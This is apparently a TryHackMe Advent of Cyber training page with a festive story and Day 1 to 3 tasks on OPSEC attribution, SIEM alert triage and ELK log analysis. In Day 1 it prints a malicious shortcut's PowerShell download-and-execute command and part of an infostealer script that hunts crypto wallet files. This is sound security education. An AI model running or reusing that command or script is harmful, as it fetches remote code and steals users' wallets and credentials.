Please note that you can use your own attacker machine instead of the AttackBox.
In that case, you will need to connect using OpenVPN. Instructions on how to set
up OpenVPN are here.
You can open the AttackBox full-screen view in a new tab using this button:
If the VM option is available:
Most tasks in Advent of Cyber will have a virtual machine attached to them. You
will use some of them as targets to train your offensive security skills and
some of them as hosts for your analysis and investigations. If this option is
available, you need to click the "Start Machine" button.
After the machine is deployed, you will see a frame appear at the top of the
room. It will display some important information, like the IP address of the
target machine, as well as options to extend the machine's timer or terminate
it.
If the split-screen option is available:
Some tasks will allow you to view your deployed VM in a split-screen view.
Typically, if this option is enabled, the split screen will open automatically.
If it doesn't, you can click this button at the top of the page for the split
screen to open.
Please note that you can open split-screen virtual machines in another tab using
this button:
If there's a direct link available:
Some virtual machines allow you to view the necessary content directly in
another tab on your browser. In this case, you'll be able to see a link to the
virtual machine directly in the task content.
Please note that for the link to work, you first need to deploy the virtual
machine attached to the task.
If there is a direct connection option available:
Some tasks will allow you to connect to the virtual machines attached using RDP,
SSH, or VNC. This is always optional, and virtual machines with this enabled
will also be accessible via a split screen. In these cases, login credentials
will be provided, like in the image below:
We provide this as some users might prefer to connect directly. However, please
note that some tasks will deliberately have this option disabled. If no
credentials are given, direct connection is not possible.
Answer the questions below
Got it!
Login to answer..
Task 5Introduction How the Glitch Stole SOC-mas
HOW THE GLITCH STOLE SOC-MAS
The snow is falling on the tech town of Wareville, and all the different Ware
families are gathering in the town square, getting ready for a town meeting. We
see the Softwares and the Freewares, skating down the neon-lit frostlanes. We
turn to Server Street, and see the Hardwares and the Firmwares marching
downtown, festive server lights blinking and flickering in their eyes. It’s time
to start preparing for SOC-mas, the most joyous time of the year in the tech
town of Wareville.
If we lift our eyes, we’ll see, beyond the buzzing city, a snow-covered mountain
of discarded technology. Boulders of old printers, cracked monitor cliffs, and
server rack ridges, held together by vines of ethernet cables, and a single old
gaming chair at the peak - this is Mount Hackit, and no Wares dare to go there.
They fear it not because of the frequent floppy disk avalanches, the Wares avoid
Mount Hackit because of the Glitch.
The Glitch’s lair is hidden in a deep cave, and he’s there now. He grabs a few
cables hanging from the ceiling and plugs them in. Although not as new and shiny
as Wareville’s, his servers work just fine! The Glitch has been watching
Wareville’s security for years, and this SOC-mas will not be different. The
Wares might fear the Glitch, thinking he is an evil hacker, but it doesn’t
matter. Cracking his fingers, he starts typing, establishing the connection to
the town’s network. Time to hack!
Back in the town square, Marta May Ware, the SOC-mas organiser, is climbing up
on the stage to address the town when all the lights suddenly flicker. All the
Wares look around, confused, but it passes quickly, and everything returns to
normal.
In the city hall, Mayor Malware slams his fists on his desk. “Blocked again!” he
shouts angrily. “That insufferable Glitch is at it again!” The mayor’s plan to
stop SOC-mas preparation by sabotaging tonight's meeting was unsuccessful. He’ll
have to think of something better for tomorrow…
In the meantime, Wareville’s SOC is in chaos. Analysts are trying to discover
what caused the sudden power surge that threatened all tech in the town. McSkidy
Software, the town’s leading cyber security expert, points at a log file on the
screen and exclaims, “Now, I don’t know exactly what happened, but this proves
we had a connection from Mount Hackit!” McSkidy runs out of the SOC and heads up
the mountain. When she reaches the cave, she does not expect to see the Glitch
waiting for her, two cups of hot cocoa in his hands, and his dog curled up at
his feet.
It takes most of the evening, but the Glitch explains what he’s been doing:
protecting the town from Mayor Malware’s evil plans. It looks like the mayor
wants to completely stop SOC-mas from happening this year! The Glitch knows the
Wares might mistrust or hate him, but he wants to help.
Now, united by a common purpose, McSkidy and the Glitch start their work in the
Mount Hackit cave, because they’re the only ones standing between Wareville and
chaos.
Come back on December 1st to help McSkidy and the Glitch defend SOC-mas against
the evil Mayor Malware’s plans!
Answer the questions below
Sounds serious! I will be here to help the Glitch on December 1st!
Login to answer..
Task 6Introduction Subscribe to TryHackMe with a 30% discount!
SUBSCRIBE WITH A DISCOUNT!
The Advent of Cyber event is completely free! However, we recommend checking out
some of the reasons to subscribe:
To celebrate Advent of Cyber, you can get 30% off personal annual subscriptions
using the discount code AOC2024 at checkout. This discount is valid until 31st
December, 2024, at 23:59 GMT – that's in:
Answer the questions below
Share the discount with your friends!
Login to answer..
Task 7 OPSEC Day 1: Maybe SOC-mas music, he thought, doesn't come from a store?
Task includes a deployable machine
The Story
McSkidy tapped keys with a confident grin,
A suspicious website, now where to begin?
She'd seen sites like this, full of code and of grime,
Shady domains, and breadcrumbs easy to find.
Click here to watch the walkthrough video!
McSkidy's fingers flew across the keyboard, her eyes narrowing at the suspicious
website on her screen. She had seen dozens of malware campaigns like this. This
time, the trail led straight to someone who went by the name "Glitch."
"Too easy," she muttered with a smirk.
"I still have time," she said, leaning closer to the screen. "Maybe there's
more."
Little did she know, beneath the surface lay something far more complex than a
simple hacker's handle. This was just the beginning of a tangled web unravelling
everything she thought she knew.
LEARNING OBJECTIVES
* Learn how to investigate malicious link files.
* Learn about OPSEC and OPSEC mistakes.
* Understand how to track and attribute digital identities in cyber
investigations.
CONNECTING TO THE MACHINE
Before moving forward, review the questions in the connection card shown below
and start the virtual machine by pressing the Start Machine button. The VM
should be fully loaded in 3 minutes. Additionally, you will need the AttackBox,
which can be launched by clicking the Start AttackBox button at the top of the
page.
Start Machine
NOTE:
If you’re clicking "Start Machine" and encountering an issue launching it, don’t
worry—it’s just the high demand. What can you do?
* Keep trying! Machines are becoming available as demand fluctuates.
* If you’re still having trouble, come back a little later when it’s less busy.
INVESTIGATING THE WEBSITE
The website we are investigating is a Youtube to MP3 converter currently being
shared amongst the organizers of SOC-mas. You've decided to dig deeper after
hearing some concerning reports about this website.
From your AttackBox, access the website by visiting MACHINE_IP using the web
browser.
At first glance, the website looks legit and presentable. The About Page even
says that it was made by "The Glitch ". How considerate of them to make our job
easier!
Scrolling down, you'll see the feature list, which promises to be "Secure" and
"Safe." From our experience, that isn't very likely.
YOUTUBE TO MP3 CONVERTER WEBSITES
These websites have been around for a long time. They offer a convenient way to
extract audio from YouTube videos, making them popular. However, historically,
these websites have been observed to have significant risks, such as:
* Malvertising: Many sites contain malicious ads that can exploit
vulnerabilities in a user's system, which could lead to infection.
* Phishing scams: Users can be tricked into providing personal or sensitive
information via fake surveys or offers.
* Bundled malware: Some converters may come with malware, tricking users into
unknowingly running it.
What nefarious thing does this website have in store for us?
GETTING SOME TUNES
Let's find out by pasting any YouTube link in the search form and pressing the
"Convert" button. Then select either mp3 or mp4 option. This should download a
file that we could use to investigate. For example, we can use
https://www.youtube.com/watch?v=dQw4w9WgXcQ, a classic if you ask me.
Once downloaded, navigate to your Downloads folder or if you are using the
AttackBox, to your /root/ directory. Locate the file named download.zip,
right-click on it, and select Extract To. In the dialog window, click the
Extract button to complete the extraction.
You'll now see two extracted two files: song.mp3 and somg.mp3.
To quickly determine the file's contents, double-click on the "Terminal" icon on
the desktop then run the file command on each one. First, let's try checking
song.mp3.
Check File 1 Terminal
user@tryhackme:~$ file song.mp3
download.mp3: Audio file with ID3 version 2.3.0, contains:MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo
There doesn't seem to be anything suspicious, according to the output. As
expected, this is just an MP3 file.
How about the second file somg.mp3? From the filename alone, we can tell
something is not right. Still, let's confirm by running the file command on it
anyway.
Check File 2 Terminal
user@tryhackme:~$ file somg.mp3
somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sat Sep 15 07:14:14 2018, mtime=Sat Sep 15 07:14:14 2018, atime=Sat Sep 15 07:14:14 2018, length=448000, window=hide
Now, this is more interesting!
The output tells us that instead of an MP3, the file is an "MS Windows
shortcut", also known as a .lnk file. This file type is used in Windows to link
to another file, folder, or application. These shortcuts can also be used to run
commands! If you've ever seen the shortcuts on a Windows desktop, you already
know what they are.
There are multiple ways to inspect .lnk files to reveal the embedded commands
and attributes. For this room, however, we'll use ExifTool, which is already
installed on this machine.
To do this, go back to your Terminal and type:
Using Exiftool Terminal
user@tryhackme:~$ exiftool somg.mp3
Look through the output to locate the command used as a shortcut in the somg.mp3
file. If you scroll down through the output, you should see a PowerShell
command.
Using Exiftool Terminal
...
Relative Path : ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working Directory : C:\Windows\System32\WindowsPowerShell\v1.0
Command Line Arguments : -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\ProgramData\s.ps1'); iex (Get-Content 'C:\ProgramData\s.ps1' -Raw)"
Machine ID : win-base-2019
user@tryhackme:~#
What this PowerShell command does:
* The -ep Bypass -nop flags disable PowerShell's usual restrictions, allowing
scripts to run without interference from security settings or user profiles.
* The DownloadFile method pulls a file (in this case, IS.ps1) from a remote
server
(https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1)
and saves it in the C:\\ProgramData\\ directory on the target machine.
* Once downloaded, the script is executed with PowerShell using the iex
command, which triggers the downloaded s.ps1 file.
If you visit the contents of the file to be downloaded using your browser
(https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1),
you will see just how lucky we are that we are not currently using Windows.
PowerShell Script Terminal
function Print-AsciiArt {
Write-Host " ____ _ ___ _____ ___ _ _ "
Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
Write-Host "| | _ | | | | | | | | | |_| |"
Write-Host "| |_| | | |___ | | | | | |__ | _ |"
Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
Write-Host " Created by the one and only M.M."
}
# Call the function to print the ASCII art
Print-AsciiArt
# Path for the info file
$infoFilePath = "stolen_info.txt"
# Function to search for wallet files
function Search-ForWallets {
$walletPaths = @(
"$env:USERPROFILE\.bitcoin\wallet.dat",
"$env:USERPROFILE\.ethereum\keystore\*",
"$env:USERPROFILE\.monero\wallet",
"$env:USERPROFILE\.dogecoin\wallet.dat"
)
Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
foreach ($path in $walletPaths) {
if (Test-Path $path) {
Add-Content -Path $infoFilePath -Value "Found wallet: $path"
}
}
}
[Output truncated for brevity]
The script is designed to collect highly sensitive information from the victim's
system, such as cryptocurrency wallets and saved browser credentials, and send
it to an attacker's remote server.
Disclaimer: All content in this room, including CPP code, PowerShell scripts,
and commands, is provided solely for educational purposes. Please do not execute
these on a Windows host.
This looks fairly typical of a PowerShell script for such a purpose, with one
notable exception: a signature in the code that reads.
> Created by the one and only M.M.
SEARCHING THE SOURCE
There are many paths we could take to continue our investigation. We could
investigate the website further, analyse its source code, or search for open
directories that might reveal more information about the malicious actor's
setup. We can search for the hash or signature on public malware databases like
VirusTotal or Any.Run. Each of these methods could yield useful clues.
However, for this room, we'll try something a bit different. Since we already
have the PowerShell code, searching for it online might give us useful leads.
It's a long shot, but we'll explore it in this exercise.
There are many places where we can search for code. The most widely used is
Github. So let's try searching there.
To search effectively, we can look for unique parts of the code that we could
use to search with. The more distinctive, the better. For this scenario, we have
the string we've uncovered before that reads:
"Created by the one and only M.M."
Search for this on Github.com or by going directly to this
link: https://github.com/search?q=%22Created+by+the+one+and+only+M.M.%22&type=issues
You'll notice something interesting if you explore the pages in the search
results.
NOTE!
If you receive an error below, it's because Github has rate limits in place if
you are not signed in. To fix this, you can just sign in with a GitHub account
or skip directly to the next step by going here:
https://github.com/Bloatware-WarevilleTHM/CryptoWallet-Search/issues/1
If you look through the search results, you can be able infer the malicious
actor's identity based on information on the project's page and the GitHub
Issues section.
Aha! Looks like this user has made a critical mistake.
INTRODUCTION TO OPSEC
This is a classic case of OPSEC failure.
Operational Security (OPSEC) is a term originally coined in the military to
refer to the process of protecting sensitive information and operations from
adversaries. The goal is to identify and eliminate potential vulnerabilities
before the attacker can learn their identity.
In the context of cyber security, when malicious actors fail to follow proper
OPSEC practices, they might leave digital traces that can be pieced together to
reveal their identity. Some common OPSEC mistakes include:
* Reusing usernames, email addresses, or account handles across multiple
platforms. One might assume that anyone trying to cover their tracks would
remove such obvious and incriminating information, but sometimes, it's due to
vanity or simply forgetfulness.
* Using identifiable metadata in code, documents, or images, which may reveal
personal information like device names, GPS coordinates, or timestamps.
* Posting publicly on forums or GitHub (Like in this current scenario) with
details that tie back to their real identity or reveal their location or
habits.
* Failing to use a VPN or proxy while conducting malicious activities allows
law enforcement to track their real IP address.
You'd think that someone doing something bad would make OPSEC their top
priority, but they're only human and can make mistakes, too.
For example, here are some real-world OPSEC mistakes that led to some really big
fails:
ALPHABAY ADMIN TAKEDOWN
One of the most spectacular OPSEC failures involved Alexandre Cazes, the
administrator of AlphaBay, one of the largest dark web marketplaces:
* Cazes used the email address "pimp_alex_91@hotmail.com" in early welcome
emails from the site.
* This email included his year of birth and other identifying information.
* He cashed out using a Bitcoin account tied to his real name.
* Cazes reused the username "Alpha02" across multiple platforms, linking his
dark web identity to forum posts under his real name.
CHINESE MILITARY HACKING GROUP (APT1)
There's also the notorious Chinese hacking group APT1, which made several OPSEC
blunders:
* One member, Wang Dong, signed his malware code with the nickname "Ugly
Gorilla".
* This nickname was linked to programming forum posts associated with his real
name.
* The group used predictable naming conventions for users, code, and passwords.
* Their activity consistently aligned with Beijing business hours, making their
location obvious.
These failures provided enough information for cyber security researchers and
law enforcement to publicly identify group members.
UNCOVERING MM
If you've thoroughly investigated the GitHub search result, you should have
uncovered several clues based on poor OPSEC practices by the malicious actor.
We know the attacker left a distinctive signature in the PowerShell code (MM).
This allowed us to search for related repositories and issues pages on GitHub.
We then discovered an Issues page where the attacker engaged in discussions,
providing more context and linking their activity to other projects.
In this discussion, they responded to a query about modifying the code. This
response, paired with their unique handle, was another critical slip-up, leaving
behind a trail of evidence that can be traced back to them. By analysing the
timestamps, usernames, and the nature of their interactions, we can now
attribute the mastermind behind the attack to MM.
WHAT'S NEXT?
McSkidy dug deeper, her mind sharp and quick,
But something felt off, a peculiar trick.
The pieces she’d gathered just didn’t align,
A puzzle with gaps, a tangled design.
As McSkidy continued digging, a pattern emerged that didn't fit the persona she
was piecing together. A different handle appeared in obscure places, buried deep
in the details: "MM."
"Who's MM?" McSkidy muttered, the mystery deepening.
Even though all signs on the website seemed to point to Glitch as the author, it
became clear that someone had gone to great lengths to ensure Glitch's name
appeared everywhere. Yet, the scattered traces left by MM suggested a deliberate
effort to shift the blame.
Answer the questions below
Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in
your terminal to find out the author of the song. Who is the author?
Login to answer..
The malicious PowerShell script sends stolen info to a C2 server. What is the
URL of this C2 server?
Login to answer..Hint
Who is M.M? Maybe his Github profile page would provide clues?
Login to answer..
What is the number of commits on the GitHub repo where the issue was raised?
Login to answer..Hint
If you enjoyed this task, feel free to check out the OPSEC room!
Login to answer..
What's with all these GitHub repos? Could they hide something else?
Login to answer..
Task 8 Log analysis Day 2: One man's false positive is another man's potpourri.
Task includes a deployable machine
The Story
Click here to watch the walkthrough video!
It’s the most wonderful time of the year again, and it’s also the most stressful
day for Wareville’s Security Operations Center (SOC) team. Despite the
overwhelming alerts generated by the new and noisy rules deployed, Wareville’s
SOC analysts have been processing them nonstop to ensure the safety of the town.
However, the SOC analysts are now burning out of all the workload needed before
Christmas. Numerous open cases are still pending, and similar alerts are still
firing repeatedly, making them think of the possibility of false positives out
of all this mess.
Now, help the awesome Wareville’s SOC team analyse the alerts to determine
whether the rumour is true—that Mayor Malware is instigating chaos within the
town.
TRUE POSITIVES OR FALSE POSITIVES?
In a SOC, events from different devices are sent to the SIEM, which is the
single source of truth where all the information and events are aggregated.
Certain rules (Detection Engineering rules) are defined to identify malicious or
suspicious activity from these events. If an event or set of events fulfils the
conditions of a rule, it triggers an alert. A SOC analyst then analyses the
alert to identify if the alert is a True Positive (TP) or a False Positive (FP).
An alert is considered a TP if it contains actual malicious activity. On the
flip side, if the alert triggers because of an activity that is not actually
malicious, it is considered an FP. This might seem very simple in theory, but
practically, separating TPs from FPs can be a tedious job. It can sometimes
become very confusing to differentiate between an attacker and a system
administrator.
MAKING A DECISION
While it is confusing to differentiate between TPs and FPs, it is very crucial
to get it right. If a TP is falsely classified as an FP, it can lead to a
significant impact from a missed cyber attack. If an FP is falsely classified as
a TP, precious time will be spent focusing on the FP, which might lead to less
focus on an actual attack. So, how exactly do we ensure that we perform this
crucial job effectively? We can use the below pointers to guide us.
Using the SOC Superpower
The SOC has a superpower. When they are unsure whether an activity is performed
by a malicious actor or a legitimate user, they can just confirm with the user.
This privilege is not available to the attacker. A SOC analyst, on the other
hand, can just send an email or call the relevant person to get confirmation of
a certain activity. In mature organisations, any changes that might trigger an
alert in the SOC often require Change Requests to be created and approved
through the IT change management process. Depending on the process, the SOC team
can ask the users to share Change Request details for confirmation. Surely, if
it is a legitimate and approved activity, it must have an approved Change
Request.
Context
While it might seem like using the SOC superpower makes things super easy, that
is not always the case. There are cases which can act as Kryptonite to the SOC
superpower:
* If an organisation doesn't have a change request process in place.
* The performed activity was outside the scope of the change request or was
different from that of the approved change request.
* The activity triggered an alert, such as copying files to a certain location,
uploading a file to some website, or a failed login to a system.
* An insider threat performed an activity they are not authorised to perform,
whether intentionally or unintentionally.
* A user performed a malicious activity via social engineering from a threat
actor.
In such scenarios, it is very important for the SOC analyst to understand the
context of the activity and make a judgement call based on their analysis skills
and security knowledge. While doing so, the analyst can look at the past
behaviour of the user or the prevalence of a certain event or artefact
throughout the organisation or a certain department. For example, if a certain
user from the network team is using Wireshark, there is a chance that other
users from the same team also use Wireshark. However, Wireshark seen on a
machine belonging to someone from HR or finance should rightfully raise some
eyebrows.
Correlation
When building the context, the analyst must correlate different events to make a
story or a timeline. Correlation entails using the past and future events to
recreate a timeline of events. When performing correlation, it is important to
note down certain important artefacts that can then be used to connect the dots.
These important artefacts can include IP addresses, machine names, user names,
hashes, file paths, etc.
Correlation requires a lot of hypothesis creation and ensuring that the evidence
supports that hypothesis. A hypothesis can be something like the user downloaded
malware from a spoofed domain. The evidence to support this can be proxy logs
that support the hypothesis that a website was visited, the website used a
spoofed domain name, and a certain file was downloaded from that website. Now,
let's say, we want to identify whether the malware executed through some
vulnerability in an application or a user intentionally executed the malware. To
see that, we might look at the parent process of the malware and the command
line parameters used to execute the said malware. If the parent process is
Windows Explorer, we can assume the user executed the malware intentionally (or
they might have been tricked into executing it via social engineering), but if
the parent process is a web browser or a word processor, we can assume that the
malware was not intentionally executed, but it was executed because of a
vulnerability in the said application.
IS THIS A TP OR AN FP?
Similar to every SOC, the analysts in the Wareville SOC also need to
differentiate TPs from FPs. This becomes especially difficult for them near
Christmas when the analysts face alert fatigue. High chances of
misclassification of TPs into FPs and vice versa are present in such times. The
analysts, therefore, appreciate any help they could get from us in this crucial
time. To make matters worse, the office of the Mayor has sent the analysts an
alert informing them of multiple encoded powershell commands run on their
systems. Perhaps we can help with that.
Connection Details
To help the analysts, we must start the Elastic SIEM in the attached VM by
clicking the Start Machine button below. The instance takes 5 minutes to
initialise and for the Elastic login page to appear.
Start Machine
Once the machine is up and running, we can connect to the Elastic SIEM by
visiting https://LAB_WEB_URL.p.thmlabs.com in your browser using the following
credentials:
URL https://LAB_WEB_URL.p.thmlabs.com Username elastic Password elastic
Once we log in, we can click the menu in the top-left corner and go to the
Discover tab to see the events.
According to the alert sent by the Mayor's office, the activity occurred on Dec
1st, 2024, between 0900 and 0930. We can set this as our time window by clicking
the timeframe settings in the upper-right corner. Note that we need to click the
Absolute tab and set the exact timeframe we want to view. Lastly, click the
Update button to apply the changes.
After updating the settings, we see 21 events in the mentioned timeframe.
In their current form, these events don't look very easily readable. We can use
the fields in the left pane to add columns to the results and make them more
readable. Hovering on the field name in the left pane will allow adding that
field as a column, as shown below.
Since we are looking for events related to PowerShell, we would like to know the
following details about the logs.
* The hostname where the command was run. We can use the host.hostname field as
a column for that.
* The user who performed the activity. We can add the user.name field as a
column for this information.
* We will add the event.category field to ensure we are looking at the correct
event category.
* To know the actual commands run using PowerShell, we can add the
process.command_line field.
* Finally, to know if the activity succeeded, we will add the event.outcome
field.
Once we have added these fields as columns, we will see the results in a format
like this.
Interesting! So, it looks like someone ran the same encoded PowerShell command
on multiple machines. Another thing to note here is that before each execution
of the PowerShell command, we see an authentication event, which was successful.
This activity is observed individually on each machine, and the time difference
between the login and PowerShell commands looks very precise. Best practices
dictate that named accounts are used for any kind of administrator activity so
that there is accountability and attribution for each administrative activity
performed. The usage of a generic admin account here also seems suspicious. On
asking, the analysts informed us that this account is used by two administrators
who were not in the office when this activity occurred. Hmmm, something is
definitely not right. Are these some of Glitch's shenanigans? Is Christmas in
danger? We need to find out who ran these commands.
Let's also add the source.ip field as a column to find out who ran the
PowerShell commands.
Since the source.ip field is only available for the authentication events, we
can filter out the process events to see if there is a pattern. To do that, we
can hover over the event.category field in one of the process events. We will
see the option to filter only for this value (+ sign) or filter out the value (-
sign), as seen below. Let's filter for authentication events by clicking the
plus (+) sign beside it to show only those in the results.
As a result, you can see that the output only renders the authentication events.
Since the result does not give useful insights, let's remove it for now. You can
do this by clicking the x beside the filter.
Since the timeframe we previously used was for the PowerShell events, and the
authentication events might have been coming from before that, we will need to
expand the search to understand the context and the historical events for this
user. Let's see if we have any events from the user from the 29th of November to
the 1st of December. Updating the time filter for these days, the results look
like this.
Note: Remember to remove the event.category filter before this step.
Woah, there have been more than 6800 events in these three days, and we see a
spike at the end of the logs. However, even though we used the time filter for
the day end on the 1st of December, we see no events after successful PowerShell
execution. There have also been a lot more authentication events in the previous
days than on the 1st of December.
To understand the events further, let's filter for our user.name with
service_admin and source.ip with 10.0.11.11 to narrow our search.
Uh-oh! It looks like all these events have been coming from the same user and
the same IP address. We definitely need to investigate further. This also does
not explain the spike. Let's filter for authentication events first by clicking
the plus (+) button beside it.
Moreover, let's filter out the Source IP here to see if we can find the IP
address that caused the spike. This can be done by clicking the minus (-) button
beside it.
After applying the filters, the expected result will be similar to the image
below.
Scrolling down, we see many events for failed logins. We also see that the IP
address for the spike (ending in .255.1) differs from the one we saw for the
events continuously coming in the previous days (10.0.11.11). The analysts have
previously investigated this and found that a script with expired credentials
was causing this issue. However, that script was updated with a fresh set of
credentials. Anyhow, this might just be another script. Let's find out.
Let's remove the source IP filter so we can focus on authentication events close
to the spike. After applying the new filter, we see that the failed logins
stopped a little while after the successful login from the new IP.
Our suspicions are rising. It seems that someone tried a brute-force attack on
December 1st, as shown by the same filters applied above.
The results also showed that they succeeded with the brute-force attempt because
of the successful authentication attempt and quickly ran some PowerShell
commands on the affected machines. Once the PowerShell commands were run, we
didn't see any further login attempts. This looks like a TP, and there needs to
be an escalation so that McSkidy can help us respond to this incident.
CHRISTMAS IN DANGER?
The alarms have gone off, and McSkidy has been called to help take this incident
further. The analysts have briefed McSkidy about the incident. McSkidy observed
that nobody had actually looked at what the PowerShell command contained. Since
the command was encoded, it needs to be decoded. McSkidy changed the filters
with event.category: process to take a deeper look at the PowerShell commands.
We can see the PowerShell command in the process.command_line field.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand
SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUAcAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA==
McSkidy knows that Encoded PowerShell commands are generally Base64 Encoded and
can be decoded using tools such as CyberChef. Since the command might contain
some sensitive information and, therefore, must not be submitted on a public
portal, McSkidy spins up her own instance of CyberChef hosted locally. McSkidy
started by pasting the encoded part of the command in the Input pane in
CyberChef.
Since it is a Base64 encoded command, McSkidy used two recipes, named
FromBase64 and Decode text from the left pane. Note that McSkidy configured the
Decode text to UTF-16LE (1200) since it is the encoding used by PowerShell for
Base64.
The result provided a sigh of relief to McSkidy, who had feared that the
Christmas had been ruined. Someone had come in to help McSkidy and the team
secure their defences, but who?
VILLAIN OR HERO?
McSkidy further analysed the secret hero and came to a startling revelation. The
credentials for the script in the machines that ran the Windows updates were
outdated. Someone brute-forced the systems and fixed the credentials after
successfully logging in. This was evident from the fact that each executed
PowerShell command was preceded by a successful login from the same Source IP,
causing failed logins over the past few days. And what's even more startling? It
was Glitch who accessed ADM-01 and fixed the credentials after McSkidy confirmed
who owned the IP address.
This meant that the people of Wareville had misunderstood Glitch, who was just
trying to help shore up the defences. But if Glitch was the one helping the
defences, who was trying to sabotage it? Was it the Mayor who informed the SOC
about these 'suspicious' PowerShell commands? Just like alerts aren't always
what they seem in a SOC, so was the case here at Wareville with people. As hard
as it was to differentiate between a TP and an FP, so was the case with the
Mayor and Glitch. However, McSkidy can perhaps use the evidence-based deduction
skills learned in a SOC to make this difference easier for the people of
Wareville.
Answer the questions below
What is the name of the account causing all the failed login attempts?
Login to answer..
How many failed logon attempts were observed?
Login to answer..Hint
What is the IP address of Glitch?
Login to answer..
When did Glitch successfully logon to ADM-01? Format: MMM D, YYYY HH:MM:SS.SSS
Login to answer..Hint
What is the decoded command executed by Glitch to fix the systems of Wareville?
Login to answer..
If you enjoyed this task, feel free to check out the Investigating with ELK
101 room.
Login to answer..
Task 9 Log analysis Day 3: Even if I wanted to go, their vulnerabilities
wouldn't allow it.
Task includes a deployable machine
The Story
Click here to watch the walkthrough video!
Today's AoC challenge follows a rather unfortunate series of events for the
Glitch. Here is a little passage which sets the scene for today's task:
Late one Christmas evening the Glitch had a feeling,
Something forgotten as he stared at the ceiling.
He got up out of bed and decided to check,
A note on his wall: ”Two days! InsnowSec”.
With a click and a type he got his hotel and tickets,
And sank off to sleep to the sound of some crickets.
Luggage in hand, he had arrived at Frosty Pines,
“To get to the conference, just follow the signs”.
Just as he was ready the Glitch got a fright,
An RCE vulnerability on their website ?!?
He exploited it quick and made a report,
But before he could send arrived his transport.
In the Frosty Pines SOC they saw an alert,
This looked quite bad, they called an expert.
The request came from a room, but they couldn’t tell which,
The logs saved the day, it was the room of…the Glitch.
In this task, we will cover how the SOC team and their expert were able to find
out what had happened (Operation Blue) and how the Glitch was able to gain
access to the website in the first place (Operation Red). Let's get started,
shall we?
LEARNING OBJECTIVES
* Learn about Log analysis and tools like ELK.
* Learn about KQL and how it can be used to investigate logs using ELK.
* Learn about RCE (Remote Code Execution), and how this can be done via
insecure file upload.
CONNECTING TO THE MACHINE
Before moving forward, review the questions in the connection card below:
Click on the green Start Machine button below to start the virtual machine for
the practical. The practical VM may take 5 minutes to become accessible.
Start Machine
You will also need to start the AttackBox by pressing the Start AttackBox button
at the top of the room. Alternatively, you can connect your own hacking machine
by using the TryHackMe VPN.
OPERATION BLUE
In this section of the lesson, we will take a look at what tools and knowledge
is required for the blue segment, that is the investigation of the attack itself
using tools which enable is to analyse the logs.
For the first part of Operation Blue, we will demonstrate how to use ELK to
analyse the logs of a demonstration web app - WareVille Rails. Feel free to
following along for practice.
LOG ANALYSIS & INTRODUCING ELK
Log analysis is crucial to blue-teaming work, as you have likely discovered
through this year's Advent of Cyber.
Analysing logs can quickly become overwhelming, especially if you have multiple
devices and services. ELK, or Elasticsearch, Logstash, and Kibana, combines data
analytics and processing tools to make analysing logs much more manageable. ELK
forms a dedicated stack that can aggregate logs from multiple sources into one
central place.
Explaining how ELK collates and processes these logs is out of the scope of
today's task. However, if you wish to learn more, you can check out the
Investigating with ELK 101 room. For now, it's important to note that multiple
processes behind the scenes achieve this.
The first part of today's task is to investigate the attack on Frosty Pines
Resort's Hotel Management System to see what it looks like to a blue teamer. You
will then test your web app skills by recreating the attack.
USING ELK
Upon loading the URL http://MACHINE_IP:5601/ within your AttackBox’s browser,
you will be greeted with the ELK Home page.
For today's task, we will use Kibana's Discover interface to review Apache2
logs. To access this, simply click on the three lines located at the top left of
the page to open the slide-out tray. Under the Analytics heading, click on
Discover.
We will need to select the collection that is relevant to us. A collection is a
group of logs. For this stage of Operation Blue, we will be reviewing the logs
present within the "wareville-rails" collection. To select this collection,
click on the dropdown on the left of the display.
Once you have done this, you will be greeted with a screen saying, "No results
match your search criteria". This is because no logs have been ingested within
the last 15 minutes. Do not panic; we will discuss how to change this shortly.
To change the date and time, click the text located on the right side of the box
that has the calendar icon. Select "Absolute" from the dropdown, where you can
now select the start date and time. Next, click on the text on the right side of
the arrow to and repeat the process for the end date and time.
For the WareVille Rails collection, we will need to set the start time to
October 1 2024 00:00:00, and the end time to October 1 23:30:00
If you are stuck, refer to the GIF below. Please note that the day and time in
this demonstration of WareVille Rails will differ from the times required to
review the FrostyPines Resorts collection in the second half of the practical.
Now that we can see some entries, let's go over the basics of the Kibana
Discover UI.
1. Search Bar: Here, we can place our search queries using KQL
2. Index Pattern: An index pattern is a collection of logs. This can be from a
specific host or, for example, multiple hosts with a similar purpose (such
as multiple web servers). In this case, the index pattern is all logs
relating to "wareville-rails"
3. Fields: This pane shows us the fields that Elasticsearch has parsed from the
logs. For example, timestamp, response type, and IP address.
4. Timeline: This visualisation displays the event count over a period of time
5. Documents (Logs): These entries are the specific entries in the log file
6. Time Filter: We can use this to narrow down a specific time frame
(absolute). Alternatively, we can search for logs based on relativity.
I.e. "Last 7 days".
KIBANA QUERY LANGUAGE (KQL)
KQL, or Kibana Query Language, is an easy-to-use language that can be used to
search documents for values. For example, querying if a value within a field
exists or matches a value. If you are familiar with Splunk, you may be thinking
of SPL (Search Processing Language).
For example, the query to search all documents for an IP address may look
like ip.address: "10.10.10.10".
Alternatively, Kibana also allows using Lucene query, an advanced language that
supports features such as fuzzy terms (searches for terms that are similar to
the one provided), regular expressions, etc. For today's task, we will stick
with using KQL, which has been enabled by default. The table below contains a
mini-cheatsheet for KQL syntax that you may find helpful in today's task.
Query/SyntaxDescriptionExample" "The two quotation marks are used to search for
specific values within the documents. Values in quotation marks are used
for exact searches."TryHackMe"*The asterisk denotes a wildcard, which searches
documents for similar matches to the value provided.United* (would return United
Kingdom and United States)ORThis logical operator is used to show documents that
contain either of the values provided."United Kingdom" OR "England"ANDThis
